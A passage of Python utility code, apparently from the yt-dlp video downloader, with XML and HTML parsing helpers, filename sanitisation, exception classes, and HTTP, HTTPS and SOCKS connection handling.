        for f in node.findall(compat_xpath(xpath)):
            if key not in f.attrib:
                continue
            if val is None or f.attrib.get(key) == val:
                return f
        return None
# On python2.6 the xml.etree.ElementTree.Element methods don't support
# the namespace parameter, so namespace prefixes are expanded by hand.
def xpath_with_ns(path, ns_map):
    """Expand 'prefix:tag' steps of an xpath into ElementTree's
    '{uri}tag' form, looking prefixes up in `ns_map`."""
    expanded = []
    for component in path.split('/'):
        parts = component.split(':')
        if len(parts) == 1:
            expanded.append(parts[0])
        else:
            prefix, tag = parts
            expanded.append('{%s}%s' % (ns_map[prefix], tag))
    return '/'.join(expanded)
def xpath_element(node, xpath, name=None, fatal=False, default=NO_DEFAULT):
    """Find the first element matching `xpath` under `node`.

    `xpath` may be a single expression or an iterable of candidates that
    are tried in order. Returns `default` if given and nothing matches,
    raises ExtractorError when `fatal` is set, otherwise returns None.
    """
    def _find(xp):
        return node.find(compat_xpath(xp))

    if isinstance(xpath, (str, compat_str)):
        found = _find(xpath)
    else:
        for xp in xpath:
            found = _find(xp)
            if found is not None:
                break

    if found is not None:
        return found
    if default is not NO_DEFAULT:
        return default
    if fatal:
        raise ExtractorError('Could not find XML element %s' % (xpath if name is None else name))
    return None
def xpath_text(node, xpath, name=None, fatal=False, default=NO_DEFAULT):
    """Like xpath_element(), but return the matched element's .text.

    The default/fatal handling mirrors xpath_element() both when the
    element is missing and when it has no text.
    """
    elem = xpath_element(node, xpath, name, fatal=fatal, default=default)
    if elem is None or elem == default:
        return elem
    if elem.text is not None:
        return elem.text
    if default is not NO_DEFAULT:
        return default
    if fatal:
        raise ExtractorError('Could not find XML element\'s text %s' % (xpath if name is None else name))
    return None
def xpath_attr(node, xpath, key, name=None, fatal=False, default=NO_DEFAULT):
    """Return attribute `key` of the first element matching xpath[@key],
    with the same default/fatal handling as xpath_element()."""
    elem = find_xpath_attr(node, xpath, key)
    if elem is not None:
        return elem.attrib[key]
    if default is not NO_DEFAULT:
        return default
    if fatal:
        raise ExtractorError('Could not find XML attribute %s' % ('%s[@%s]' % (xpath, key) if name is None else name))
    return None
def get_element_by_id(id, html):
    """Return the content of the tag with the specified ID in the passed HTML document"""
    # Thin wrapper over the generic attribute lookup.
    return get_element_by_attribute('id', id, html)
def get_element_by_class(class_name, html):
    """Return the content of the first tag with the specified class in the passed HTML document"""
    retval = get_elements_by_class(class_name, html)
    # None when no element carries the class.
    return retval[0] if retval else None
def get_element_by_attribute(attribute, value, html, escape_value=True):
    """Return the content of the first tag whose `attribute` equals `value`
    in the passed HTML document, or None if there is no match."""
    retval = get_elements_by_attribute(attribute, value, html, escape_value)
    return retval[0] if retval else None
def get_elements_by_class(class_name, html):
    """Return the content of all tags with the specified class in the passed HTML document as a list"""
    # The class attribute is a whitespace-separated list, so match the
    # class name as a whole word anywhere inside the attribute value.
    return get_elements_by_attribute(
        'class', r'[^\'"]*\b%s\b[^\'"]*' % re.escape(class_name),
        html, escape_value=False)
def get_elements_by_attribute(attribute, value, html, escape_value=True):
    """Return the content of the tag with the specified attribute in the passed HTML document

    `value` may be a regex fragment when escape_value is False (see
    get_elements_by_class). Matching is regex-based, not a real HTML
    parse, so nested same-name tags are not handled.
    """
    value = re.escape(value) if escape_value else value

    retlist = []
    for m in re.finditer(r'''(?xs)
        <([a-zA-Z0-9:._-]+)
         (?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'|))*?
         \s+%s=['"]?%s['"]?
         (?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'|))*?
        \s*>
        (?P<content>.*?)
        </\1>
    ''' % (re.escape(attribute), value), html):
        res = m.group('content')

        # Strip one level of surrounding quotes if present.
        if res.startswith('"') or res.startswith("'"):
            res = res[1:-1]

        retlist.append(unescapeHTML(res))

    return retlist
class HTMLAttributeParser(compat_HTMLParser):
    """Trivial HTML parser to gather the attributes for a single element"""
    def __init__(self):
        # Filled by handle_starttag; empty if no start tag was fed.
        self.attrs = {}
        compat_HTMLParser.__init__(self)

    def handle_starttag(self, tag, attrs):
        # Later start tags overwrite earlier ones — only the last element
        # fed to the parser is reflected.
        self.attrs = dict(attrs)
def extract_attributes(html_element):
    """Given a string for an HTML element such as
    <el
         a="foo" B="bar" c="&#98;az" d=boz
         empty= noval entity="&amp;"
         sq='"' dq="'"
    >
    Decode and return a dictionary of attributes.
    {
        'a': 'foo', 'b': 'bar', c: 'baz', d: 'boz',
        'empty': '', 'noval': None, 'entity': '&',
        'sq': '"', 'dq': '\''
    }.
    NB HTMLParser is stricter in Python 2.6 & 3.2 than in later versions,
    but the cases in the unit test will work for all of 2.6, 2.7, 3.2-3.5.
    """
    parser = HTMLAttributeParser()
    try:
        parser.feed(html_element)
        parser.close()
    # Older Python may throw HTMLParseError in case of malformed HTML
    except compat_HTMLParseError:
        pass
    return parser.attrs
def clean_html(html):
    """Clean an HTML snippet into a readable string"""
    # Convenience for sanitizing descriptions etc.
    if html is None:
        return html

    # Collapse literal newlines, turn <br> and paragraph boundaries into
    # newlines, then drop any remaining markup.
    cleaned = html.replace('\n', ' ')
    for pattern, replacement in (
            (r'(?u)\s*<\s*br\s*/?\s*>\s*', '\n'),
            (r'(?u)<\s*/\s*p\s*>\s*<\s*p[^>]*>', '\n'),
            ('<.*?>', '')):
        cleaned = re.sub(pattern, replacement, cleaned)
    # Replace html entities
    return unescapeHTML(cleaned).strip()
def sanitize_open(filename, open_mode):
    """Try to open the given filename, and slightly tweak it if this fails.

    Attempts to open the given filename. If this fails, it tries to change
    the filename slightly, step by step, until it's either able to open it
    or it fails and raises a final exception, like the standard open()
    function.

    It returns the tuple (stream, definitive_file_name).
    """
    try:
        if filename == '-':
            # '-' means stdout; on Windows it must be switched to binary
            # mode so media bytes are not mangled by CRLF translation.
            if sys.platform == 'win32':
                import msvcrt
                msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
            return (sys.stdout.buffer if hasattr(sys.stdout, 'buffer') else sys.stdout, filename)
        stream = open(encodeFilename(filename), open_mode)
        return (stream, filename)
    except (IOError, OSError) as err:
        # Permission errors will not be fixed by renaming — give up.
        if err.errno in (errno.EACCES,):
            raise

        # In case of error, try to remove win32 forbidden chars
        alt_filename = sanitize_path(filename)
        if alt_filename == filename:
            raise
        else:
            # An exception here should be caught in the caller
            stream = open(encodeFilename(alt_filename), open_mode)
            return (stream, alt_filename)
def timeconvert(timestr):
    """Convert RFC 2822 defined time string into system timestamp"""
    parsed = email.utils.parsedate_tz(timestr)
    if parsed is None:
        # Unparseable input yields None rather than raising.
        return None
    return email.utils.mktime_tz(parsed)
def sanitize_filename(s, restricted=False, is_id=False):
    """Sanitizes a string so it could be used as part of a filename.
    If restricted is set, use a stricter subset of allowed characters.
    Set is_id if this is not an arbitrary string, but an ID that should be kept
    if possible.
    """
    def _sanitize_char(char):
        # Transliterate accents only in restricted mode.
        if restricted and char in ACCENT_CHARS:
            return ACCENT_CHARS[char]
        codepoint = ord(char)
        if char == '?' or codepoint < 32 or codepoint == 127:
            return ''
        if char == '"':
            return '' if restricted else '\''
        if char == ':':
            return '_-' if restricted else ' -'
        if char in '\\/|*<>':
            return '_'
        if restricted and (char in '!&\'()[]{}$;`^,#' or char.isspace()):
            return '_'
        if restricted and codepoint > 127:
            return '_'
        return char

    if s == '':
        return ''
    # Handle timestamps: turn 12:34:56 into 12_34_56 before the
    # per-character pass would insert ' -' for each ':'.
    s = re.sub(r'[0-9]+(?::[0-9]+)+', lambda m: m.group(0).replace(':', '_'), s)
    result = ''.join(_sanitize_char(c) for c in s)
    if not is_id:
        # Collapse runs of underscores and trim leading/trailing junk.
        while '__' in result:
            result = result.replace('__', '_')
        result = result.strip('_')
        # Common case of "Foreign band name - English song title"
        if restricted and result.startswith('-_'):
            result = result[2:]
        if result.startswith('-'):
            result = '_' + result[len('-'):]
        result = result.lstrip('.')
        if not result:
            result = '_'
    return result
def sanitize_path(s, force=False):
    """Sanitizes and normalizes path on Windows"""
    # On Windows the sanitization always applies; elsewhere only when
    # `force` is set (e.g. writing to a Windows-hosted share).
    if sys.platform == 'win32':
        force = False
        drive_or_unc, _ = os.path.splitdrive(s)
        if sys.version_info < (2, 7) and not drive_or_unc:
            drive_or_unc, _ = os.path.splitunc(s)
    elif force:
        drive_or_unc = ''
    else:
        return s

    norm_path = os.path.normpath(remove_start(s, drive_or_unc)).split(os.path.sep)
    if drive_or_unc:
        norm_path.pop(0)
    # Replace characters forbidden in Windows path components, as well as
    # trailing spaces/dots, but keep '.'/'..' components intact.
    sanitized_path = [
        path_part if path_part in ['.', '..'] else re.sub(r'(?:[/<>:"\|\\?\*]|[\s.]$)', '#', path_part)
        for path_part in norm_path]
    if drive_or_unc:
        sanitized_path.insert(0, drive_or_unc + os.path.sep)
    elif force and s[0] == os.path.sep:
        # Preserve the leading separator of an absolute path.
        sanitized_path.insert(0, os.path.sep)
    return os.path.join(*sanitized_path)
def sanitize_url(url):
    """Normalize a URL: give scheme-relative URLs an `http:` scheme and
    repair a couple of scheme typos seen in the wild."""
    # Prepend protocol-less URLs with `http:` scheme in order to mitigate
    # the number of unwanted failures due to missing protocol
    if url.startswith('//'):
        return 'http:%s' % url
    typo_fixes = (
        # https://github.com/ytdl-org/youtube-dl/issues/15649
        (r'^httpss://', r'https://'),
        # https://bx1.be/lives/direct-tv/
        (r'^rmtp([es]?)://', r'rtmp\1://'),
    )
    for broken, fixed in typo_fixes:
        repaired, substitutions = re.subn(broken, fixed, url)
        if substitutions:
            return repaired
    return url
def extract_basic_auth(url):
    """Split userinfo out of `url`.

    Returns (url_without_credentials, authorization_header_value) — the
    header value is None when the URL carries no username.
    """
    parts = compat_urlparse.urlsplit(url)
    if parts.username is None:
        return url, None
    # Rebuild the netloc without the user:password part.
    netloc = parts.hostname
    if parts.port is not None:
        netloc = '%s:%d' % (netloc, parts.port)
    stripped_url = compat_urlparse.urlunsplit(parts._replace(netloc=netloc))
    credentials = '%s:%s' % (parts.username, parts.password or '')
    token = base64.b64encode(credentials.encode('utf-8')).decode('utf-8')
    return stripped_url, 'Basic ' + token
def sanitized_Request(url, *args, **kwargs):
    """Build a urllib Request with the URL sanitized/escaped and any
    inline credentials moved into an Authorization header."""
    url, auth_header = extract_basic_auth(escape_url(sanitize_url(url)))
    if auth_header is not None:
        # Request(url, data, headers) — headers is the second positional
        # argument after url is stripped off.
        headers = args[1] if len(args) >= 2 else kwargs.setdefault('headers', {})
        headers['Authorization'] = auth_header
    return compat_urllib_request.Request(url, *args, **kwargs)
def expand_path(s):
    """Expand shell variables and ~"""
    # compat_expanduser handles platform quirks of os.path.expanduser.
    return os.path.expandvars(compat_expanduser(s))
def orderedSet(iterable):
    """ Remove all duplicates from the input iterable """
    # Membership is tested with `==` (not hashing) so unhashable items
    # are supported; first occurrence order is preserved.
    unique = []
    for item in iterable:
        if item not in unique:
            unique.append(item)
    return unique
def _htmlentity_transform(entity_with_semicolon):
    """Transforms an HTML entity to a character."""
    # Strip the trailing ';' for the legacy name table lookup.
    entity = entity_with_semicolon[:-1]

    # Known non-numeric HTML entity
    if entity in compat_html_entities.name2codepoint:
        return compat_chr(compat_html_entities.name2codepoint[entity])

    # TODO: HTML5 allows entities without a semicolon. For example,
    # '&Eacuteric' should be decoded as 'Éric'.
    if entity_with_semicolon in compat_html_entities_html5:
        return compat_html_entities_html5[entity_with_semicolon]

    # Numeric character reference: decimal (#123) or hex (#x7B).
    mobj = re.match(r'#(x[0-9a-fA-F]+|[0-9]+)', entity)
    if mobj is not None:
        numstr = mobj.group(1)
        if numstr.startswith('x'):
            base = 16
            numstr = '0%s' % numstr
        else:
            base = 10
        # See https://github.com/ytdl-org/youtube-dl/issues/7518
        try:
            return compat_chr(int(numstr, base))
        except ValueError:
            pass

    # Unknown entity in name, return its literal representation
    return '&%s;' % entity
def unescapeHTML(s):
    """Replace HTML entities in `s` with their decoded characters.

    Returns None unchanged for convenience when sanitizing optional text.
    """
    if s is None:
        return None
    assert type(s) == compat_str

    # Each '&name;' / '&#num;' occurrence is decoded individually.
    return re.sub(
        r'&([^&;]+;)', lambda m: _htmlentity_transform(m.group(1)), s)
def escapeHTML(text):
    """Escape &, <, >, and both quote characters for safe embedding of
    `text` in HTML.

    Note: the replacement strings had been corrupted to the raw
    characters themselves (a no-op, and `.replace("'", ''')` was not even
    valid syntax); the proper HTML entities are restored here. '&' must
    be escaped first so the other entities are not double-escaped.
    """
    return (
        text
        .replace('&', '&amp;')
        .replace('<', '&lt;')
        .replace('>', '&gt;')
        .replace('"', '&quot;')
        .replace("'", '&#39;')
    )
def process_communicate_or_kill(p, *args, **kwargs):
    """Like Popen.communicate(), but kill and reap the child process if
    communication is interrupted, so no zombie is left behind."""
    try:
        return p.communicate(*args, **kwargs)
    except BaseException:  # Including KeyboardInterrupt
        p.kill()
        p.wait()
        raise
def get_subprocess_encoding():
    """Return the encoding used for arguments/output of subprocesses."""
    if sys.platform == 'win32' and sys.getwindowsversion()[0] >= 5:
        # For subprocess calls, encode with locale encoding
        # Refer to http://stackoverflow.com/a/9951851/35070
        encoding = preferredencoding()
    else:
        encoding = sys.getfilesystemencoding()
    # getfilesystemencoding() may return None on some Python 2 setups.
    if encoding is None:
        encoding = 'utf-8'
    return encoding
def encodeFilename(s, for_subprocess=False):
    """
    @param s The name of the file
    """
    assert type(s) == compat_str

    # Python 3 has a Unicode API
    if sys.version_info >= (3, 0):
        return s

    # Pass '' directly to use Unicode APIs on Windows 2000 and up
    # (Detecting Windows NT 4 is tricky because 'major >= 4' would
    # match Windows 9x series as well. Besides, NT 4 is obsolete.)
    if not for_subprocess and sys.platform == 'win32' and sys.getwindowsversion()[0] >= 5:
        return s

    # Jython assumes filenames are Unicode strings though reported as Python 2.x compatible
    if sys.platform.startswith('java'):
        return s

    # Python 2 on other platforms: encode with the subprocess/filesystem
    # encoding, dropping unencodable characters.
    return s.encode(get_subprocess_encoding(), 'ignore')
def decodeFilename(b, for_subprocess=False):
    """Inverse of encodeFilename: decode a byte filename on Python 2.

    On Python 3, or when `b` is already text, it is returned unchanged;
    `for_subprocess` is accepted for API symmetry with encodeFilename.
    """
    if sys.version_info >= (3, 0) or not isinstance(b, bytes):
        return b
    return b.decode(get_subprocess_encoding(), 'ignore')
def encodeArgument(s):
    """Encode a command-line argument for passing to a subprocess."""
    if not isinstance(s, compat_str):
        # Legacy code that uses byte strings
        # Uncomment the following line after fixing all post processors
        # assert False, 'Internal error: %r should be of type %r, is %r' % (s, compat_str, type(s))
        s = s.decode('ascii')
    return encodeFilename(s, True)
def decodeArgument(b):
    """Decode a subprocess command-line argument back to text."""
    return decodeFilename(b, True)
def decodeOption(optval):
    """Decode a command-line option value to a text string (Python 2
    passes byte strings through sys.argv)."""
    if optval is None:
        return optval
    if isinstance(optval, bytes):
        optval = optval.decode(preferredencoding())

    assert isinstance(optval, compat_str)
    return optval
def formatSeconds(secs, delim=':', msec=False):
    """Format a duration in seconds as H:MM:SS, M:SS or S.

    @param secs   duration in seconds (int or float)
    @param delim  separator between hour/minute/second fields
    @param msec   if True, append '.mmm' milliseconds

    Fixes: exact hours/minutes previously fell into the smaller-unit
    branch (3600 -> '60:00'), and the msec suffix used `secs % 1`
    directly, which always rendered as '000' because the fraction is < 1.
    """
    if secs >= 3600:
        ret = '%d%s%02d%s%02d' % (secs // 3600, delim, (secs % 3600) // 60, delim, secs % 60)
    elif secs >= 60:
        ret = '%d%s%02d' % (secs // 60, delim, secs % 60)
    else:
        ret = '%d' % secs
    # Scale the fractional second to milliseconds for the suffix.
    return '%s.%03d' % (ret, (secs % 1) * 1000) if msec else ret
def make_HTTPS_handler(params, **kwargs):
    """Build a YoutubeDLHTTPSHandler honoring the `nocheckcertificate`
    option, with fallbacks for older Python ssl modules."""
    opts_no_check_certificate = params.get('nocheckcertificate', False)
    if hasattr(ssl, 'create_default_context'):  # Python >= 3.4 or 2.7.9
        context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
        if opts_no_check_certificate:
            # Disable both hostname and certificate verification.
            context.check_hostname = False
            context.verify_mode = ssl.CERT_NONE
        try:
            return YoutubeDLHTTPSHandler(params, context=context, **kwargs)
        except TypeError:
            # Python 2.7.8
            # (create_default_context present but HTTPSHandler has no context=)
            pass

    if sys.version_info < (3, 2):
        # Very old Python: no usable SSLContext support in HTTPSHandler.
        return YoutubeDLHTTPSHandler(params, **kwargs)
    else:  # Python < 3.4
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.verify_mode = (ssl.CERT_NONE
                               if opts_no_check_certificate
                               else ssl.CERT_REQUIRED)
        context.set_default_verify_paths()
        return YoutubeDLHTTPSHandler(params, context=context, **kwargs)
def bug_reports_message(before=';'):
    """Return the standard 'please report this issue' blurb, joined onto
    the punctuation/text in `before`.

    The message is capitalized when `before` (stripped of trailing
    whitespace) is empty or already ends a sentence.
    """
    if ytdl_is_updateable():
        update_cmd = 'type  yt-dlp -U  to update'
    else:
        update_cmd = 'see  https://github.com/yt-dlp/yt-dlp  on how to update'
    msg = ('please report this issue on  https://github.com/yt-dlp/yt-dlp .'
           ' Make sure you are using the latest version; %s.'
           ' Be sure to call yt-dlp with the --verbose flag and include its complete output.') % update_cmd

    before = before.rstrip()
    if not before or before.endswith(('.', '!', '?')):
        msg = msg[0].title() + msg[1:]

    return (before + ' ' if before else '') + msg
class YoutubeDLError(Exception):
    """Base exception for YoutubeDL errors.

    All errors raised by this module/package derive from this class so
    callers can catch them with a single except clause.
    """
    pass
# Exception types indicating network-level failures; ExtractorError marks
# errors caused by these as `expected` (i.e. not a bug in yt-dlp).
network_exceptions = [compat_urllib_error.URLError, compat_http_client.HTTPException, socket.error]
if hasattr(ssl, 'CertificateError'):
    # Not present in very old ssl modules.
    network_exceptions.append(ssl.CertificateError)
network_exceptions = tuple(network_exceptions)
class ExtractorError(YoutubeDLError):
    """Error during info extraction."""

    def __init__(self, msg, tb=None, expected=False, cause=None, video_id=None):
        """ tb, if given, is the original traceback (so that it can be printed out).
        If expected is set, this is a normal error message and most likely not a bug in yt-dlp.
        """

        # Network failures are never considered yt-dlp bugs.
        if sys.exc_info()[0] in network_exceptions:
            expected = True
        if video_id is not None:
            msg = video_id + ': ' + msg
        if cause:
            msg += ' (caused by %r)' % cause
        if not expected:
            # Ask the user to file a bug for unexpected errors.
            msg += bug_reports_message()
        super(ExtractorError, self).__init__(msg)

        self.traceback = tb
        self.exc_info = sys.exc_info()  # preserve original exception
        self.cause = cause
        self.video_id = video_id

    def format_traceback(self):
        """Return the stored traceback formatted as a string, or None."""
        if self.traceback is None:
            return None
        return ''.join(traceback.format_tb(self.traceback))
class UnsupportedError(ExtractorError):
    """Raised when no extractor supports the given URL."""
    def __init__(self, url):
        super(UnsupportedError, self).__init__(
            'Unsupported URL: %s' % url, expected=True)
        self.url = url
class RegexNotFoundError(ExtractorError):
    """Error when a regex didn't match"""
    pass
class GeoRestrictedError(ExtractorError):
    """Geographic restriction Error exception.

    This exception may be thrown when a video is not available from your
    geographic location due to geographic restrictions imposed by a website.
    """

    def __init__(self, msg, countries=None):
        super(GeoRestrictedError, self).__init__(msg, expected=True)
        self.msg = msg
        # Optional list of country codes from which the video is available.
        self.countries = countries
class DownloadError(YoutubeDLError):
    """Download Error exception.

    This exception may be thrown by FileDownloader objects if they are not
    configured to continue on errors. They will contain the appropriate
    error message.
    """

    def __init__(self, msg, exc_info=None):
        """ exc_info, if given, is the original exception that caused the trouble (as returned by sys.exc_info()). """
        super(DownloadError, self).__init__(msg)
        self.exc_info = exc_info
class EntryNotInPlaylist(YoutubeDLError):
    """Entry not in playlist exception.

    This exception will be thrown by YoutubeDL when a requested entry
    is not found in the playlist info_dict
    """
    pass
class SameFileError(YoutubeDLError):
    """Same File exception.

    This exception will be thrown by FileDownloader objects if they detect
    multiple files would have to be downloaded to the same file on disk.
    """
    pass
class PostProcessingError(YoutubeDLError):
    """Post Processing exception.

    This exception may be raised by PostProcessor's .run() method to
    indicate an error in the postprocessing task.
    """

    def __init__(self, msg):
        super(PostProcessingError, self).__init__(msg)
        self.msg = msg
class ExistingVideoReached(YoutubeDLError):
    """ An already-downloaded video was encountered and --break-on-existing
    was given, so downloading should stop. (The previous docstring was a
    copy-paste of MaxDownloadsReached's.) """
    pass
class RejectedVideoReached(YoutubeDLError):
    """ A video was rejected by the configured filters and --break-on-reject
    was given, so downloading should stop. (The previous docstring was a
    copy-paste of MaxDownloadsReached's.) """
    pass
class ThrottledDownload(YoutubeDLError):
    """ Raised when the download speed falls below --throttled-rate. """
    pass
class MaxDownloadsReached(YoutubeDLError):
    """ --max-downloads limit has been reached. """
    pass
class UnavailableVideoError(YoutubeDLError):
    """Unavailable Format exception.

    This exception will be thrown when a video is requested
    in a format that is not available for that video.
    """
    pass
class ContentTooShortError(YoutubeDLError):
    """Content Too Short exception.

    This exception may be raised by FileDownloader objects when a file they
    download is too small for what the server announced first, indicating
    the connection was probably interrupted.
    """

    def __init__(self, downloaded, expected):
        super(ContentTooShortError, self).__init__(
            'Downloaded {0} bytes, expected {1} bytes'.format(downloaded, expected)
        )
        # Both in bytes
        self.downloaded = downloaded
        self.expected = expected
class XAttrMetadataError(YoutubeDLError):
    """Raised when writing extended file attributes fails; classifies the
    failure into a machine-readable `reason`."""
    def __init__(self, code=None, msg='Unknown error'):
        super(XAttrMetadataError, self).__init__(msg)
        self.code = code
        self.msg = msg

        # Parsing code and msg
        if (self.code in (errno.ENOSPC, errno.EDQUOT)
                or 'No space left' in self.msg or 'Disk quota exceeded' in self.msg):
            self.reason = 'NO_SPACE'
        elif self.code == errno.E2BIG or 'Argument list too long' in self.msg:
            self.reason = 'VALUE_TOO_LONG'
        else:
            self.reason = 'NOT_SUPPORTED'
class XAttrUnavailableError(YoutubeDLError):
    """Raised when no mechanism for writing extended attributes is available."""
    pass
def _create_http_connection(ydl_handler, http_class, is_https, *args, **kwargs):
    """Instantiate `http_class`, wiring in the user-configured
    `source_address` (with address-family filtering) when present."""
    # Working around python 2 bug (see http://bugs.python.org/issue17849) by limiting
    # expected HTTP responses to meet HTTP/1.0 or later (see also
    # https://github.com/ytdl-org/youtube-dl/issues/6727)
    if sys.version_info < (3, 0):
        kwargs['strict'] = True
    hc = http_class(*args, **compat_kwargs(kwargs))
    source_address = ydl_handler._params.get('source_address')

    if source_address is not None:
        # This is to workaround _create_connection() from socket where it will try all
        # address data from getaddrinfo() including IPv6. This filters the result from
        # getaddrinfo() based on the source_address value.
        # This is based on the cpython socket.create_connection() function.
        # https://github.com/python/cpython/blob/master/Lib/socket.py#L691
        def _create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, source_address=None):
            host, port = address
            err = None
            addrs = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
            # Derive the address family from the shape of the source address
            # ('.' implies a dotted-quad IPv4 literal).
            af = socket.AF_INET if '.' in source_address[0] else socket.AF_INET6
            ip_addrs = [addr for addr in addrs if addr[0] == af]
            if addrs and not ip_addrs:
                ip_version = 'v4' if af == socket.AF_INET else 'v6'
                raise socket.error(
                    "No remote IP%s addresses available for connect, can't use '%s' as source address"
                    % (ip_version, source_address[0]))
            for res in ip_addrs:
                af, socktype, proto, canonname, sa = res
                sock = None
                try:
                    sock = socket.socket(af, socktype, proto)
                    if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
                        sock.settimeout(timeout)
                    sock.bind(source_address)
                    sock.connect(sa)
                    err = None  # Explicitly break reference cycle
                    return sock
                except socket.error as _:
                    err = _
                    if sock is not None:
                        sock.close()
            if err is not None:
                raise err
            else:
                raise socket.error('getaddrinfo returns an empty list')
        if hasattr(hc, '_create_connection'):
            hc._create_connection = _create_connection
        sa = (source_address, 0)
        if hasattr(hc, 'source_address'):  # Python 2.7+
            hc.source_address = sa
        else:  # Python 2.6
            # No source_address support: replace connect() wholesale.
            def _hc_connect(self, *args, **kwargs):
                sock = _create_connection(
                    (self.host, self.port), self.timeout, sa)
                if is_https:
                    self.sock = ssl.wrap_socket(
                        sock, self.key_file, self.cert_file,
                        ssl_version=ssl.PROTOCOL_TLSv1)
                else:
                    self.sock = sock
            hc.connect = functools.partial(_hc_connect, hc)

    return hc
def handle_youtubedl_headers(headers):
    """Process yt-dlp's internal pseudo-headers.

    If 'Youtubedl-no-compression' is present, return a copy of `headers`
    with it and any Accept-Encoding header removed; otherwise return
    `headers` unchanged.
    """
    filtered_headers = headers

    if 'Youtubedl-no-compression' in filtered_headers:
        filtered_headers = {
            key: value for key, value in filtered_headers.items()
            if key.lower() != 'accept-encoding'}
        del filtered_headers['Youtubedl-no-compression']

    return filtered_headers
class YoutubeDLHandler(compat_urllib_request.HTTPHandler):
    """Handler for HTTP requests and responses.

    This class, when installed with an OpenerDirector, automatically adds
    the standard headers to every HTTP request and handles gzipped and
    deflated responses from web servers. If compression is to be avoided in
    a particular request, the original request in the program code only has
    to include the HTTP header "Youtubedl-no-compression", which will be
    removed before making the real request.

    Part of this code was copied from:

    http://techknack.net/python-urllib2-handlers/

    Andrew Rowls, the author of that code, agreed to release it to the
    public domain.
    """

    def __init__(self, params, *args, **kwargs):
        compat_urllib_request.HTTPHandler.__init__(self, *args, **kwargs)
        self._params = params

    def http_open(self, req):
        conn_class = compat_http_client.HTTPConnection

        # Route through a SOCKS proxy when the internal pseudo-header is set.
        socks_proxy = req.headers.get('Ytdl-socks-proxy')
        if socks_proxy:
            conn_class = make_socks_conn_class(conn_class, socks_proxy)
            del req.headers['Ytdl-socks-proxy']

        return self.do_open(functools.partial(
            _create_http_connection, self, conn_class, False),
            req)

    @staticmethod
    def deflate(data):
        """Decompress a deflate body, accepting both raw and zlib-wrapped
        streams (servers disagree about which 'deflate' means)."""
        if not data:
            return data
        try:
            return zlib.decompress(data, -zlib.MAX_WBITS)
        except zlib.error:
            return zlib.decompress(data)

    def http_request(self, req):
        # According to RFC 3986, URLs can not contain non-ASCII characters, however this is not
        # always respected by websites, some tend to give out URLs with non percent-encoded
        # non-ASCII characters (see telemb.py, ard.py [#3412])
        # urllib chokes on URLs with non-ASCII characters (see http://bugs.python.org/issue3991)
        # To work around aforementioned issue we will replace request's original URL with
        # percent-encoded one
        # Since redirects are also affected (e.g. http://www.southpark.de/alle-episoden/s18e09)
        # the code of this workaround has been moved here from YoutubeDL.urlopen()
        url = req.get_full_url()
        url_escaped = escape_url(url)

        # Substitute URL if any change after escaping
        if url != url_escaped:
            req = update_Request(req, url=url_escaped)

        for h, v in std_headers.items():
            # Capitalize is needed because of Python bug 2275: http://bugs.python.org/issue2275
            # The dict keys are capitalized because of this bug by urllib
            if h.capitalize() not in req.headers:
                req.add_header(h, v)

        req.headers = handle_youtubedl_headers(req.headers)

        if sys.version_info < (2, 7) and '#' in req.get_full_url():
            # Python 2.6 is brain-dead when it comes to fragments
            req._Request__original = req._Request__original.partition('#')[0]
            req._Request__r_type = req._Request__r_type.partition('#')[0]

        return req

    def http_response(self, req, resp):
        old_resp = resp
        # gzip
        if resp.headers.get('Content-encoding', '') == 'gzip':
            content = resp.read()
            gz = gzip.GzipFile(fileobj=io.BytesIO(content), mode='rb')
            try:
                uncompressed = io.BytesIO(gz.read())
            except IOError as original_ioerror:
                # There may be junk add the end of the file
                # See http://stackoverflow.com/q/4928560/35070 for details
                for i in range(1, 1024):
                    try:
                        gz = gzip.GzipFile(fileobj=io.BytesIO(content[:-i]), mode='rb')
                        uncompressed = io.BytesIO(gz.read())
                    except IOError:
                        continue
                    break
                else:
                    raise original_ioerror
            resp = compat_urllib_request.addinfourl(uncompressed, old_resp.headers, old_resp.url, old_resp.code)
            resp.msg = old_resp.msg
            del resp.headers['Content-encoding']
        # deflate
        if resp.headers.get('Content-encoding', '') == 'deflate':
            gz = io.BytesIO(self.deflate(resp.read()))
            resp = compat_urllib_request.addinfourl(gz, old_resp.headers, old_resp.url, old_resp.code)
            resp.msg = old_resp.msg
            del resp.headers['Content-encoding']
        # Percent-encode redirect URL of Location HTTP header to satisfy RFC 3986 (see
        # https://github.com/ytdl-org/youtube-dl/issues/6457).
        if 300 <= resp.code < 400:
            location = resp.headers.get('Location')
            if location:
                # As of RFC 2616 default charset is iso-8859-1 that is respected by python 3
                if sys.version_info >= (3, 0):
                    location = location.encode('iso-8859-1').decode('utf-8')
                else:
                    location = location.decode('utf-8')
                location_escaped = escape_url(location)
                if location != location_escaped:
                    del resp.headers['Location']
                    if sys.version_info < (3, 0):
                        location_escaped = location_escaped.encode('utf-8')
                    resp.headers['Location'] = location_escaped
        return resp

    # HTTPS requests/responses go through the same processing.
    https_request = http_request
    https_response = http_response
def make_socks_conn_class(base_class, socks_proxy):
    """Derive a connection class from `base_class` (an HTTPConnection or
    HTTPSConnection) whose connect() tunnels through the SOCKS proxy
    described by the URL `socks_proxy`.

    Supported schemes: socks5, socks / socks4 (SOCKS4), socks4a.

    @raises ValueError for an unsupported proxy scheme. Previously an
            unknown scheme left `socks_type` unbound, surfacing later as a
            confusing NameError far from the cause.
    """
    assert issubclass(base_class, (
        compat_http_client.HTTPConnection, compat_http_client.HTTPSConnection))

    url_components = compat_urlparse.urlparse(socks_proxy)

    scheme = url_components.scheme.lower()
    if scheme == 'socks5':
        socks_type = ProxyType.SOCKS5
    elif scheme in ('socks', 'socks4'):
        socks_type = ProxyType.SOCKS4
    elif scheme == 'socks4a':
        socks_type = ProxyType.SOCKS4A
    else:
        raise ValueError('Unsupported SOCKS proxy scheme: %s' % url_components.scheme)

    def unquote_if_non_empty(s):
        # Proxy credentials are percent-encoded in the URL; leave
        # empty/None values untouched.
        if not s:
            return s
        return compat_urllib_parse_unquote_plus(s)

    proxy_args = (
        socks_type,
        url_components.hostname, url_components.port or 1080,
